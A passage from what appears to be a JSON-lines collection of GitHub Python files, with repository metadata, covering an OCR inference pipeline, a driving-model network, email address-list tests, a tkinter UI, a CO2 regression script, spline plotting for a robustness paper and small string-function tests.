numpy as np\r\nimport logging\r\nimport utility as utility\r\nimport predict_rec as predict_rec\r\nimport predict_det as predict_det\r\nimport predict_cls as predict_cls\r\nfrom ppocr.utils.logging import get_logger\r\nfrom utility import get_rotate_crop_image\r\nlogger = get_logger()\r\n\r\n\r\nclass TextSystem(object):\r\n def __init__(self, args):\r\n if not args.show_log:\r\n logger.setLevel(logging.INFO)\r\n\r\n self.text_detector = predict_det.TextDetector(args)\r\n self.text_recognizer = predict_rec.TextRecognizer(args)\r\n self.use_angle_cls = args.use_angle_cls\r\n self.drop_score = args.drop_score\r\n if self.use_angle_cls:\r\n self.text_classifier = predict_cls.TextClassifier(args)\r\n\r\n def print_draw_crop_rec_res(self, img_crop_list, rec_res):\r\n bbox_num = len(img_crop_list)\r\n for bno in range(bbox_num):\r\n cv2.imwrite(\"./output/img_crop_%d.jpg\" % bno, img_crop_list[bno])\r\n logger.info(bno, rec_res[bno])\r\n\r\n def __call__(self, img, cls=True):\r\n ori_im = img.copy()\r\n dt_boxes, elapse = self.text_detector(img)\r\n\r\n logger.debug(\"dt_boxes num : {}, elapse : {}\".format(\r\n len(dt_boxes), elapse))\r\n if dt_boxes is None:\r\n return None, None\r\n img_crop_list = []\r\n\r\n dt_boxes = sorted_boxes(dt_boxes)\r\n\r\n for bno in range(len(dt_boxes)):\r\n tmp_box = copy.deepcopy(dt_boxes[bno])\r\n img_crop = get_rotate_crop_image(ori_im, tmp_box)\r\n img_crop_list.append(img_crop)\r\n if self.use_angle_cls and cls:\r\n img_crop_list, angle_list, elapse = self.text_classifier(\r\n img_crop_list)\r\n logger.debug(\"cls num : {}, elapse : {}\".format(\r\n len(img_crop_list), elapse))\r\n\r\n rec_res, elapse = self.text_recognizer(img_crop_list)\r\n logger.debug(\"rec_res num : {}, elapse : {}\".format(\r\n len(rec_res), elapse))\r\n # self.print_draw_crop_rec_res(img_crop_list, rec_res)\r\n filter_boxes, filter_rec_res = [], []\r\n for box, rec_reuslt in zip(dt_boxes, rec_res):\r\n text, score = rec_reuslt\r\n if score >= self.drop_score:\r\n filter_boxes.append(box)\r\n filter_rec_res.append(rec_reuslt)\r\n return filter_boxes, filter_rec_res\r\n\r\n\r\ndef sorted_boxes(dt_boxes):\r\n \"\"\"\r\n Sort text boxes in order from top to bottom, left to right\r\n args:\r\n dt_boxes(array):detected text boxes with shape [4, 2]\r\n return:\r\n sorted boxes(array) with shape [4, 2]\r\n \"\"\"\r\n num_boxes = dt_boxes.shape[0]\r\n sorted_boxes = sorted(dt_boxes, key=lambda x: (x[0][1], x[0][0]))\r\n _boxes = list(sorted_boxes)\r\n\r\n for i in range(num_boxes - 1):\r\n if abs(_boxes[i + 1][0][1] - _boxes[i][0][1]) < 10 and \\\r\n (_boxes[i + 1][0][0] < _boxes[i][0][0]):\r\n tmp = _boxes[i]\r\n _boxes[i] = _boxes[i + 1]\r\n _boxes[i + 1] = tmp\r\n return _boxes\r\n\r\n\r\ndef main():\r\n args = utility.parse_args()\r\n args.image_dir=\"../../doc/imgs/11.jpg\" \r\n args.det_model_dir=\"../../models/ch_PP-OCRv2_det_infer/\"\r\n args.rec_model_dir=\"../../models/ch_PP-OCRv2_rec_infer/\"\r\n args.rec_char_dict_path=\"../../ppocr/utils/ppocr_keys_v1.txt\"\r\n args.use_angle_cls=False \r\n args.use_gpu=True\r\n\r\n \r\n text_sys = TextSystem(args)\r\n\r\n # warm up 10 times\r\n if 1:\r\n img = np.random.uniform(0, 255, [640, 640, 3]).astype(np.uint8)\r\n for i in range(10):\r\n res = text_sys(img)\r\n\r\n img = cv2.imread(args.image_dir)\r\n dt_boxes, rec_res = text_sys(img)\r\n for text, score in rec_res:\r\n logger.info(\"{}, {:.3f}\".format(text, score))\r\n src_im = img\r\n for box in dt_boxes:\r\n box = np.array(box).astype(np.int32).reshape(-1, 2)\r\n cv2.polylines(src_im, [box], True, color=(255, 255, 0), thickness=2)\r\n\r\n cv2.imwrite('./enpei.jpg',src_im)\r\n\r\n# main()\r\n\r\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/9.virtual reader/baidu_pp_ocr/tools/infer/predict_system.py","file_name":"predict_system.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"} +{"seq_id":"2717323712","text":"def func_a(arr, n):\r\n new_list = []\r\n for i in arr:\r\n if i != n:\r\n new_list.append(i)\r\n else:\r\n continue\r\n return new_list\r\n\r\ndef func_b(a, b):\r\n if a >= b:\r\n return a - b\r\n else:\r\n return b - a\r\n\r\ndef func_c(arr):\r\n maximum = 0\r\n for i in arr:\r\n if i > maximum:\r\n maximum = i\r\n return maximum\r\n\r\ndef solution(visitor):\r\n visitor_2 = func_a(visitor,func_c(visitor))\r\n max_1 = func_c(visitor)\r\n max_2 = func_c(visitor_2)\r\n return func_b(max_1, max_2)\r\n\r\nprint(solution([10,20,30,40]))","repo_name":"seokju7/cospro-python","sub_path":"problem 13.py","file_name":"problem 13.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3763994581","text":"from logger import coil_logger\nimport torch.nn as nn\nimport torch\nimport importlib\nimport os\n\nfrom configs import g_conf\nfrom coilutils.general import command_number_to_index\n\nfrom .building_blocks import Branching\nfrom .building_blocks import FC\n\nclass CoILMemExtract(nn.Module):\n\n def __init__(self, params):\n\n super(CoILMemExtract, self).__init__()\n self.params = params\n number_first_layer_channels = 0\n\n for _, sizes in g_conf.SENSORS.items():\n number_first_layer_channels += sizes[0] * g_conf.ALL_FRAMES_INCLUDING_BLANK\n\n # Get one item from the dict\n sensor_input_shape = next(iter(g_conf.SENSORS.values()))\n sensor_input_shape = [number_first_layer_channels, sensor_input_shape[1],\n sensor_input_shape[2]]\n\n self.predicted_speed = 0\n\n if 'res' in params['perception']:\n resnet_module = importlib.import_module('network.models.building_blocks.resnet')\n resnet_module = getattr(resnet_module, params['perception']['res']['name'])\n self.perception = resnet_module(\n pretrained=g_conf.PRE_TRAINED,\n input_channels=number_first_layer_channels,\n num_classes=params['perception']['res']['num_classes']\n )\n\n number_output_neurons = params['perception']['res']['num_classes']\n \n else:\n raise ValueError(\"perception type is not-defined\")\n\n\n self.speed_branch = FC(\n params={\n 'neurons': [number_output_neurons] \n + params['speed_branch']['fc']['neurons'] + [1],\n 'dropouts': params['speed_branch']['fc']['dropouts'] + [0.0],\n 'end_layer': True\n }\n )\n\n branch_fc_vector = []\n for i in range(params['branches']['number_of_branches']):\n branch_fc_vector.append(\n FC(\n params={\n 'neurons': [number_output_neurons]\n + params['branches']['fc']['neurons'] \n + [len(g_conf.TARGETS)],\n 'dropouts': params['branches']['fc']['dropouts'] + [0.0],\n 'end_layer': True\n }\n )\n )\n \n self.branches = Branching(branch_fc_vector)\n \n \n def forward(self, x):\n\n x, _ = self.perception(x)\n\n speed_branch_output = self.speed_branch(x)\n \n branch_outputs = self.branches(x)\n\n return branch_outputs + [speed_branch_output], x.detach()\n","repo_name":"linYDTHU/Resolving_copycat_problems_via_residual_prediction","sub_path":"network/models/coil_memory_extraction.py","file_name":"coil_memory_extraction.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41757705182","text":"from email.headerregistry import Address\n\nfrom mailers.message import AddressList\n\n\ndef test_constructor() -> None:\n addresses = AddressList(\"Root \")\n assert addresses == \"Root \"\n\n addresses = AddressList(None)\n assert not addresses\n\n addresses = AddressList([\"root@localhost\", \"user@localhost\"])\n assert addresses == \"root@localhost, user@localhost\"\n\n addresses = AddressList(Address(addr_spec=\"root@localhost\"))\n assert addresses == \"root@localhost\"\n\n addresses = AddressList([Address(addr_spec=\"root@localhost\"), Address(addr_spec=\"user@localhost\")])\n assert addresses == \"root@localhost, user@localhost\"\n\n\ndef test_add() -> None:\n addresses = AddressList()\n addresses.add(\"root@localhost\", Address(addr_spec=\"user@localhost\"))\n assert addresses == \"root@localhost, user@localhost\"\n\n\ndef test_set() -> None:\n addresses = AddressList(\"root@localhost\")\n addresses.set(\"user@localhost\")\n assert addresses == \"user@localhost\"\n\n\ndef test_clear() -> None:\n addresses = AddressList(\"root@localhost\")\n addresses.clear()\n assert addresses.empty\n\n\ndef test_first() -> None:\n addresses = AddressList(\"root@localhost\")\n assert addresses.first\n assert addresses.first.addr_spec == \"root@localhost\"\n\n addresses = AddressList()\n assert addresses.first is None\n\n\ndef test_empty() -> None:\n addresses = AddressList()\n assert addresses.empty\n\n addresses.add(\"root@localhost\")\n assert not addresses.empty\n\n\ndef test_iterable() -> None:\n addresses = AddressList(\"root@localhost\")\n assert next(iter(addresses)).addr_spec == \"root@localhost\"\n\n\ndef test_length() -> None:\n addresses = AddressList(\"root@localhost\")\n assert len(addresses) == 1\n\n\ndef test_boolean() -> None:\n addresses = AddressList()\n assert not bool(addresses)\n\n addresses = AddressList(\"root@localhost\")\n assert bool(addresses)\n\n\ndef test_descriptor() -> None:\n class T:\n f = AddressList()\n\n instance = T()\n instance.f = \"root@localhost\"\n assert type(instance.f) == AddressList\n assert len(instance.f) == 1\n\n instance.f = Address(addr_spec=\"root@localhost\")\n assert instance.f == \"root@localhost\"\n\n instance.f = None\n assert instance.f == \"\"\n","repo_name":"alex-oleshkevich/mailers","sub_path":"tests/test_address_list.py","file_name":"test_address_list.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"10020022631","text":"\r\nfrom tkinter import *\r\nroot = Tk()\r\nroot.title('TV Show Recomendation System') \r\nroot.geometry(\"900x700\") \r\nroot.config(background = \"white\")\r\nw = Label(root, text ='Welcome to TV Show Analysis',bg = \"white\", font = \"100\").grid(row=0,column=1) \r\n#w.pack() \r\nLabel(root, text='Enter the title of TV shows',bg = \"white\").grid(row=1)\r\ne1 = Entry(root)\r\ne1.grid(row=1, column=1)\r\nbutton = Button(root, text='Search', width=25).grid(row=1,column=2)\r\ndef topTen():\r\n a=10\r\nbutton1 = Button(root, text='Top 10 TV show',command=topTen, width=25).grid(row=2,column=0)\r\nbutton2 = Button(root, text='Top 10 Movies', width=25).grid(row=2,column=1)\r\nbutton3 = Button(root, text='Comapre Two Shows', width=25).grid(row=2,column=2)\r\nbutton4 = Button(root, text='View Sentiment analysis data distributions', width=35).grid(row=2,column=3,padx = 5, pady = 10)\r\nbutton10 = Button(root, text='Exit', width=25, command=root.destroy).grid(row=10,column=1)\r\n#button.pack()\r\n\r\n \r\nroot.mainloop()\r\n","repo_name":"sanjayKumar-dev/TV-Show-Popularity-Analysis","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35082064031","text":"# Jonathan Oakey\r\n\r\n\r\nclass Predict_Emissions_From_Engine_Size:\r\n\r\n\r\n def __init__(self):\r\n # Import required libraries:\r\n import pandas as pd\r\n # Read the CSV file :\r\n data = pd.read_csv(\"https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/FuelConsumptionCo2.csv\")\r\n train_testing_data = self.generate_training_testing_data(data)\r\n train = train_testing_data['train']\r\n test = train_testing_data['test']\r\n regr = self.create_and_plot_model(train)\r\n\r\n\r\n while True:\r\n print(\"\")\r\n print(\"what would you like to do?\")\r\n print('Choose from one of the choices below:')\r\n print('Check Accuracy')\r\n print('Make Predictions')\r\n print('Explore Data')\r\n print('Exit')\r\n the_response = input()\r\n if 'Exit' in the_response:\r\n break\r\n elif 'Check Accuracy' in the_response:\r\n self.checking_accuracy(regr,test)\r\n elif 'Make Predictions' in the_response:\r\n self.making_predictions(regr)\r\n elif 'Explore Data' in the_response:\r\n self.explore_data(data)\r\n else:\r\n print('unknown response...try again')\r\n\r\n def explore_data(self,data):\r\n \r\n import matplotlib.pyplot as plt\r\n \r\n # Let's select some features to explore more :\r\n data = data[[\"ENGINESIZE\",\"CO2EMISSIONS\"]]\r\n # ENGINESIZE vs CO2EMISSIONS:\r\n plt.scatter(data[\"ENGINESIZE\"] , data[\"CO2EMISSIONS\"] , color=\"blue\")\r\n plt.xlabel(\"ENGINESIZE\")\r\n plt.ylabel(\"CO2EMISSIONS\")\r\n plt.show()\r\n\r\n def generate_training_testing_data(self,data):\r\n train_testing_data = {}\r\n # Generating training and testing data from our data:\r\n # We are using 80% data for training.\r\n train = data[:(int((len(data)*0.8)))]\r\n test = data[(int((len(data)*0.8))):]\r\n train_testing_data['train'] = train\r\n train_testing_data['test'] = test\r\n return train_testing_data\r\n\r\n\r\n\r\n def create_and_plot_model(self,train):\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n from sklearn import linear_model\r\n model_data = {}\r\n # Modeling:\r\n # Using sklearn package to model data :\r\n regr = linear_model.LinearRegression()\r\n train_x = np.array(train[[\"ENGINESIZE\"]])\r\n train_y = np.array(train[[\"CO2EMISSIONS\"]])\r\n regr.fit(train_x,train_y)\r\n # The coefficients:\r\n print('Model Created')\r\n print (\"coefficients : \",regr.coef_) #Slope\r\n print (\"Intercept : \",regr.intercept_) #Intercept\r\n # Plotting the regression line:\r\n plt.scatter(train[\"ENGINESIZE\"], train[\"CO2EMISSIONS\"], color='blue')\r\n plt.plot(train_x, regr.coef_*train_x + regr.intercept_, '-r')\r\n plt.xlabel(\"Engine size\")\r\n plt.ylabel(\"Emission\")\r\n return regr\r\n\r\n\r\n\r\n def get_regression_predictions(self,input_features,intercept,slope):\r\n # Predicting values:\r\n # Function for predicting future values :\r\n predicted_values = input_features*slope + intercept\r\n return predicted_values\r\n\r\n def making_predictions(self,regr):\r\n # Predicting emission for future car:\r\n # my_engine_size = 3.5\r\n print('enter an engine size (ex: 3.5)')\r\n my_engine_size = input()\r\n my_engine_size = float(my_engine_size)\r\n estimatd_emission = self.get_regression_predictions(my_engine_size,regr.intercept_[0],regr.coef_[0][0])\r\n print (\"Estimated Emission :\",estimatd_emission)\r\n\r\n\r\n def checking_accuracy(self,regr,test):\r\n # Checking various accuracy:\r\n import numpy as np\r\n from sklearn.metrics import r2_score\r\n test_x = np.array(test[['ENGINESIZE']])\r\n test_y = np.array(test[['CO2EMISSIONS']])\r\n test_y_ = regr.predict(test_x)\r\n print(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\r\n print(\"Mean sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\r\n print(\"R2-score: %.2f\" % r2_score(test_y_ , test_y) )\r\n\r\n\r\n\r\n\r\nPredict_Emissions_From_Engine_Size()\r\n\r\n","repo_name":"jonoak/Predict_Emissions_From_Engine_Size","sub_path":"Predict_Emissions_From_Engine_Size.py","file_name":"Predict_Emissions_From_Engine_Size.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34177882402","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom fig2_spline import get_feats, get_P\n\nmatplotlib.rcParams.update({'font.size': 22})\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n\ndef make_legend_arrow(legend, orig_handle,\n xdescent, ydescent,\n width, height, fontsize):\n p = matplotlib.patches.FancyArrow(0, 0.5*height, width, 0, length_includes_head=True, head_width=0.75*height, color='black')\n return p\n\n\ndef plot_augmentations_polar(S0, theta_star):\n angles = np.r_[np.linspace(0, 2*np.pi, 1000), np.pi, np.pi/2, 3*np.pi/2]\n fig, ax = plt.subplots(figsize=(6, 6))\n bad_c = 'white'\n good_c = 'C1'\n\n ax.set_facecolor(bad_c)\n\n def get_lhs_rhs(x):\n rho = (np.inner(x, theta_star)) / np.maximum(np.inner(x, x), 1e-16)\n lhs = rho**2 * S0.dot(x).dot(x)\n rhs = 2 * rho * S0.dot(x).dot(theta_star)\n return lhs, rhs\n\n for angle in angles:\n x1v = 2*np.pi * np.cos(angle)\n x2v = 2*np.pi * np.sin(angle)\n x = np.asarray([x1v, x2v])\n lhs, rhs = get_lhs_rhs(x)\n\n if rhs - lhs > -1e-10:\n plt.plot([0, x1v], [0, x2v], color=good_c, zorder=0)\n plt.plot([0],[0], color=good_c, zorder=0)\n plt.axis([-1, 1, -1, 1])\n arrow = plt.arrow(0, 0, theta_star[0], theta_star[1], width=0.02, alpha=1, length_includes_head=True, color='black', zorder=100)\n plt.legend([arrow],\n [r'$\\theta^*$'],\n loc=\"lower right\",\n handler_map={matplotlib.patches.FancyArrow : matplotlib.legend_handler.HandlerPatch(patch_func=make_legend_arrow),})\n ax = plt.gca()\n ax.spines['left'].set_position('zero')\n ax.spines['right'].set_color('none')\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('none')\n ax.yaxis.set_ticks_position('none')\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.text(0, 1.1, '$e_2$', horizontalalignment='center')\n ax.text(1.1, 0, '$e_1$', verticalalignment='center')\n\n\n##################\n# Figure 3\n##################\nmatplotlib.rcParams.update({'font.size': 28})\ntheta_star = np.asarray([1, 0.2])\nX = np.diag([1, 2])\nS0 = X.T @ X\nplot_augmentations_polar(S0, theta_star)\nplt.subplots_adjust(bottom=0.15, left=0.2)\nplt.savefig('flag_less_skew.png')\n\nmatplotlib.rcParams.update({'font.size': 28})\ntheta_star = np.asarray([1, 0.2])\nX = np.diag([1, 5])\nS0 = X.T @ X\nplot_augmentations_polar(S0, theta_star)\nplt.subplots_adjust(bottom=0.15, left=0.2)\nplt.savefig('flag_more_skew.png')\n\n\n##################\n# Figure 7\n##################\n\nnum_stairs = 10\nnum_examples = 22\nadv_eps = (1.0 / 2)\nnoise_eps = 0.0\nx_noise = 0.1\nslope = 1\nnp.set_printoptions(precision=5)\ndiscrete_support = True\n\nknots = np.r_[np.arange(num_stairs), np.arange(num_stairs)+adv_eps]\nknots = np.sort(knots)\nweights_1 = np.asarray([1/5]*5)\nweights_2 = np.asarray([0.01]*(num_stairs-5))\nweights = np.concatenate([weights_1, weights_2])\nweights /= np.sum(weights)\nX = np.r_[np.arange(5).astype(float)]\nX = np.sort(X)\ny = slope*np.floor(X)\n\n# compute the population \\Sigma_0\n\n# first we must rotate the spline basis in a way that the correct norm is being minimized\nfeats = get_feats(X, knots)\n# add small identity for numerical stability\nP = get_P(knots) + 1e-10 * np.eye(22)\neigvals, eigs = np.linalg.eig(P)\neigvals = np.maximum(eigvals, 0)\nQ = eigs.dot(np.linalg.pinv(np.diag(np.sqrt(eigvals)))).dot(eigs.T)\nP_half = np.linalg.inv(Q)\n# Q.T X^T X Q\n\nS0_trans = np.zeros((feats.shape[1], feats.shape[1]))\nfor x in range(num_stairs):\n x1, x2 = get_feats(np.asarray([x, x+adv_eps]), knots).dot(Q)\n S0_trans += (1 - x_noise) * weights[x] * np.outer(x1, x1) + x_noise * weights[x] * np.outer(x2, x2)\n\ndef solve_rotated(X, y):\n feats = get_feats(X, knots)\n feats_trans = feats.dot(Q)\n theta_trans = np.linalg.pinv(feats_trans.T.dot(feats_trans)).dot(feats_trans.T.dot(y))\n return feats_trans, theta_trans\n\nfeats_std_trans, theta_std_trans = solve_rotated(X, y)\n# construct theta_star\nall_xs = np.r_[np.asarray([i for i in range(num_stairs)]), np.asarray([i + adv_eps for i in range(num_stairs)])]\nall_xs = np.sort(all_xs)\nall_ys = slope*np.floor(all_xs)\nall_feats_trans, theta_star_trans = solve_rotated(all_xs, all_ys)\n\ndef plot_std_aug(theta_std, theta_aug):\n X_stairs = np.arange(0, num_stairs).astype(float)\n y_stairs = slope*X_stairs\n for X_stair, y_stair in zip(X_stairs, y_stairs):\n plt.plot([X_stair, X_stair+adv_eps], [y_stair, y_stair], color='black', alpha=0.5)\n\n X_t = np.linspace(0, num_stairs-0.5, 100)\n plt.plot(X_t, get_feats(X_t, knots).dot(Q).dot(theta_std), label='Standard', linestyle='dashed', lw=5)\n plt.plot(X_t, get_feats(X_t, knots).dot(Q).dot(theta_aug), label='Augmented', linestyle='solid', lw=5)\n plt.legend()\n plt.legend()\n plt.scatter(X, y, color='black', s=75, zorder=1000)\n plt.xlabel(r'$t$')\n plt.ylabel(r'$f_{\\theta}(t)$')\n\n# add 3.5\nmatplotlib.rcParams.update({'font.size': 18})\n\nX_aug = np.r_[X, 3.5]\nX_aug = np.sort(X_aug)\ny_aug = slope*np.floor(X_aug)\nfeats_aug, theta_aug = solve_rotated(X_aug, y_aug)\nplt.figure(figsize=(5,5))\n\nplot_std_aug(theta_std_trans, theta_aug)\nplt.axis('equal')\nplt.xlim([-0.5, 10])\nplt.ylim([-0.5, 10])\nplt.xticks(np.arange(0, 10, 2.0))\nplt.yticks(np.arange(0, 10, 2.0))\nplt.scatter([3.5], [3], marker='X', s=75, color='C2', zorder=1000)\n\nplt.savefig('spline_add_35.png')\n\n# add 4.5\nmatplotlib.rcParams.update({'font.size': 22})\nfeats_std_trans, theta_std_trans = solve_rotated(X, y)\nall_xs = np.r_[np.asarray([i for i in range(num_stairs)]), np.asarray([i + adv_eps for i in range(num_stairs)])]\nall_xs = np.sort(all_xs)\nall_ys = slope*np.floor(all_xs)\nall_feats_trans, theta_star_trans = solve_rotated(all_xs, all_ys)# add 4.5\nmatplotlib.rcParams.update({'font.size': 18})\nX_aug = np.r_[X, 4.5]\nX_aug = np.sort(X_aug)\ny_aug = slope*np.floor(X_aug)\nfeats_aug, theta_aug = solve_rotated(X_aug, y_aug)\nplt.figure(figsize=(5,5))\n\nplot_std_aug(theta_std_trans, theta_aug)\nplt.axis('equal')\nplt.xlim([-0.5, 10])\nplt.ylim([-0.5, 10])\nplt.xticks(np.arange(0, 10, 2.0))\nplt.yticks(np.arange(0, 10, 2.0))\nplt.scatter([4.5], [4], marker='X', s=75, color='C2', zorder=1000)\nplt.savefig('spline_add_45.png')\n\n# plot the difference in test error as suggested in Theorem 1, Fig 7a\n\nplt.clf()\n# check if a perturbation does/does not satisfy the criterion\nhatS0 = feats_std_trans.T.dot(feats_std_trans)\n\ndef proj(S, rank_S=None):\n eigvals, eigs = np.linalg.eig(S)\n if rank_S is not None:\n sort_idx = np.argsort(-eigvals)\n eigvals[sort_idx[:rank_S]] = 1\n eigvals[sort_idx[rank_S:]] = 0\n else:\n eigvals[eigvals <= 1e-8] = 0.0\n eigvals[eigvals > 0] = 1.0\n return eigs.dot(np.diag(eigvals)).dot(eigs.T).real\nhat_proj_0 = np.eye(hatS0.shape[0]) - proj(hatS0, rank_S=feats_std_trans.shape[0])\n\ndef criterion(S0, theta_star, proj0, x):\n theta_0 = proj0.dot(theta_star)\n u = proj0.dot(x)\n if np.inner(u, u) < 1e-10:\n return 0\n rho = np.inner(theta_0, u) / np.inner(u, u)\n diff = 2 * rho * S0.dot(theta_0).dot(u) - rho**2 * S0.dot(u).dot(u)\n return diff\n\nmatplotlib.rcParams.update({'font.size': 16})\n\n# on the line\nlines = np.arange(10).astype(float)\nline_feats = get_feats(lines, knots)\nline_feats_trans = line_feats.dot(Q)\nline_diffs = []\nfor i in range(line_feats_trans.shape[0]):\n x = line_feats_trans[i]\n diff = -criterion(S0_trans, theta_star_trans, hat_proj_0, x).real\n line_diffs.append(diff)\n# not on the line\nperts = np.arange(10).astype(float) + adv_eps\npert_feats = get_feats(perts, knots)\npert_feats_trans = pert_feats.dot(Q)\npert_diffs = []\nfor i in range(pert_feats_trans.shape[0]):\n x = pert_feats_trans[i]\n diff = -criterion(S0_trans, theta_star_trans, hat_proj_0, x).real\n pert_diffs.append(diff)\nplt.scatter(lines, line_diffs, label='On the line', marker='o', s=90)\nplt.scatter(perts, pert_diffs, label='Perturbations', marker='^', s=90)\nplt.ylabel('Bias criterion (Aug - Std)')\nplt.xlabel(r'Augmentation point ($t$)')\nplt.xticks(np.arange(0, 10, 1.0))\nplt.legend(loc=\"upper right\")\nplt.subplots_adjust(bottom=0.15, left=0.15)\nplt.savefig('spline_perturbations.png')\nmatplotlib.rcParams.update({'font.size': 22})\n\n###############\n# Fig 4\n###############\nmatplotlib.rcParams.update({'font.size': 28})\n# curr dataset\nX = np.r_[0,1]\nX = np.sort(X)\ny = slope*np.floor(X)\n\n# rotation matrix\nP = get_P(knots) + 1e-10 * np.eye(22)\neigvals, eigs = np.linalg.eig(P)\neigvals = np.maximum(eigvals, 0)\nQ = eigs.dot(np.linalg.pinv(np.diag(np.sqrt(eigvals)))).dot(eigs.T)\n\nX0 = get_feats(X, knots).dot(Q)\n\nxaug_raw = np.r_[X, 4.5]\nXaug = get_feats(xaug_raw, knots).dot(Q)\nyaug = np.floor(xaug_raw)\n\n# std estimator\nstdest = np.linalg.pinv(X0.T @ X0) @ (X0.T @ y)\n\naugest = np.linalg.pinv(Xaug.T @ Xaug) @ (Xaug.T @ yaug)\n# sigma\nS_trans = all_feats_trans.T @ all_feats_trans\nS_eigs, S_eigv = np.linalg.eig(S_trans)\n\nfor i in range(S_eigv.shape[1]):\n if i > 5:\n break\n plt.figure()\n plt.plot(np.arange(S_eigv.shape[0]), S_eigv[:, i], lw=5)\n plt.xlabel('t')\n plt.ylabel('f(t)')\n plt.title('$q_{%d}$' % (i+1))\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n plt.savefig(f'eig{i}.png')\n\n\n##########\n# Fig 8\n##########\n\nmatplotlib.rcParams.update({'font.size': 23})\n\ndef normalize(x):\n return x / np.linalg.norm(x)\nplt.figure(figsize=(5,5))\nfig, ax = plt.subplots()\nlocal_idx = 19\nglobal_idx = 2\n\nval_8 = 5\nval_45 = 1.5\nxaug8 = get_feats(np.asarray([val_8]), knots).dot(Q).squeeze()\nxaug45 = get_feats(np.asarray([val_45]), knots).dot(Q).squeeze()\nprojX0 = np.eye(X0.shape[1]) - proj(X0.T @ X0, rank_S=X0.shape[0])\nS_gl = (S_eigv.T @ projX0)[[local_idx, global_idx]]\ntstar_proj = normalize(S_gl @ theta_star_trans)\n# we reflected these two vectors for better presentation\nxaug_proj8 = -normalize( S_gl @ xaug8)\nxaug_proj45 = -normalize(S_gl @ xaug45)\n\n# plotting code\ntext_eps = 0.1\narr1 = ax.arrow(0, 0, tstar_proj[0], tstar_proj[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C0', zorder=100)\nax.text(tstar_proj[0]-0.1, tstar_proj[1] - 4*text_eps, r'$\\theta^* - \\hat{\\theta}_{std}$', usetex=True, color='C0')\narr2 = ax.arrow(0, 0, xaug_proj8[0] , xaug_proj8[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C4', zorder=100)\nax.text(xaug_proj8[0]-10*text_eps, xaug_proj8[1], r'$\\Pi_{lg}X(5)$', usetex=True, color='C4')\narr3 = ax.arrow(0, 0, xaug_proj45[0], xaug_proj45[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C1', zorder=100)\nax.text(xaug_proj45[0]+text_eps, xaug_proj45[1]-0.1, r'$\\Pi_{lg}X(1.5)$', usetex=True, color='C1')\n\ntstar_proj_proj = np.inner(tstar_proj, xaug_proj45) * xaug_proj45\nplt.plot([1, tstar_proj_proj[0]], [0, tstar_proj_proj[1]], linestyle='dashed', color='C2')\n\nslope_perp = (-tstar_proj_proj[1]) / (1-tstar_proj_proj[0])\nlittle_sq_x_int = 0.75\nb_perp = -(slope_perp * little_sq_x_int)\nplt.plot([0.3, 0.2], [0.3*slope_perp + b_perp, 0.2*slope_perp + b_perp], linestyle='solid', color='C2')\nslope_nonperp = xaug_proj45[1] / xaug_proj45[0]\nb_nonperp = -0.15*slope_nonperp\nplt.plot([0.3, 0.36], [0.3*slope_nonperp + b_nonperp, 0.36*slope_nonperp + b_nonperp], linestyle='solid', color='C2')\n\nax.set_ylim([-1, 1.4])\nax.set_xlim([-0.2, 1.5])\nax.set_aspect('equal')\nax.spines['left'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['bottom'].set_position('zero')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('none')\nax.yaxis.set_ticks_position('none')\nax.set_yticklabels([])\nax.set_xticklabels([])\nax.text(0, 1.6, 'Global ($q_3$)', horizontalalignment='center', weight='bold')\nax.text(1.9, 0, 'Local ($q_{2s}$)', verticalalignment='center', weight='bold')\n# remove the ticks from the top and right edges\n\nplt.tight_layout()\nplt.savefig('local_global.png')\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"splines/fig3478_spline.py","file_name":"fig3478_spline.py","file_ext":"py","file_size_in_byte":11943,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"27749963376","text":"import pytest\nfrom .find_char import find\n\n\n@pytest.mark.parametrize(\"input_d,expected_output\", [\n ((\"aaabbbccc\", \"a\"), 0),\n ((\"aaabbbccc\", \"c\"), 6),\n ((\"aaabbbccc\", \"d\"), -1),\n])\ndef test_normal_sum_int2(input_d, expected_output):\n result = find(input_d[0], input_d[1])\n print(\"input: {0}, output: {1}, expected: {2}\".format(input_d, result, expected_output))\n assert result == expected_output\n\n\nfrom .self_work import split\n\n\n@pytest.mark.parametrize(\"input_d,expected_output\", [\n ((\"Hello world!!!\", \" \"), ['Hello', 'world!!!']),\n ((\"Helloworld!!! \", \" \"), ['Helloworld!!!', '']),\n])\ndef test_split(input_d, expected_output):\n result = split(input_d[0], input_d[1])\n print(\"input: {0}, output: {1}, expected: {2}\".format(input_d, result, expected_output))\n assert result == 